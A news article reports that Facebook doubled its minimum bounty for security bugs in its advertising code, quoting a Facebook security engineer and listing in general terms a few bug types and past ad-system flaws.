Facebook doubled the bounties for security vulnerabilities discovered in the code behind its advertising system, according to PC World. Researchers who find bugs in the ads code will be paid at least $1,000, and not $500 as until now.
Typical vulnerabilities include wrong permission checks, insufficient rate-limiting, edge-case CSRF issues, and Flash problems in the ads code. The social network announced it just finished a â€œcomprehensiveâ€ security audit in this area.
â€œWe found and fixed a number of security bugs but would like to encourage additional scrutiny from Whitehats to see what we might have missed,â€ Facebook security engineer Collin Greene wrote in a blog post.
â€œAlso, since the vast majority of bug reports we work on with the Whitehat community are focused on the more common parts of Facebook code, we hope to encourage researchers to become more familiar with the surface area of ads to better protect the businesses that use them.â€
The security engineer also shared several tips for successfully finding bugs in ads code and mentioned some past ad bugs they managed to fix:
- Redeeming the same ads coupon multiple times without expiry;
- Retrieving the name of an unpublished Page via the Ads Create Flow by guessing its Page ID;
- Arbitrary local file read via a .zip symlink;
Besides APIs or analytics, Facebook encourages whitehats to discover ad bugs in â€œeverything else.â€
â€œThere is a lot of backend code to correctly target, deliver, bill and measure ads,â€ Greene said. This code isn’t directly reachable via the website, but of the small number of issues that have been found in these areas, they are relatively high impact.â€
Since Facebookâ€™s bug bounty program debut in 2011, whitehats have earned over $3 million for discovering new vulnerabilities. A year ago, Yahoo! made headlines after dumping T-shirt bounties for money rewards. The news came after several Swiss security researchers publicly shamed the tech giant for offering branded clothing instead of actual money. Yahoo! announced it will replace T-shirt rewards with bounties up to $15,000 for â€œnew, unique and/or high riskâ€ bugs.
For more information about Facebookâ€™s bug bounty program, “hunters” can also read this recent guide.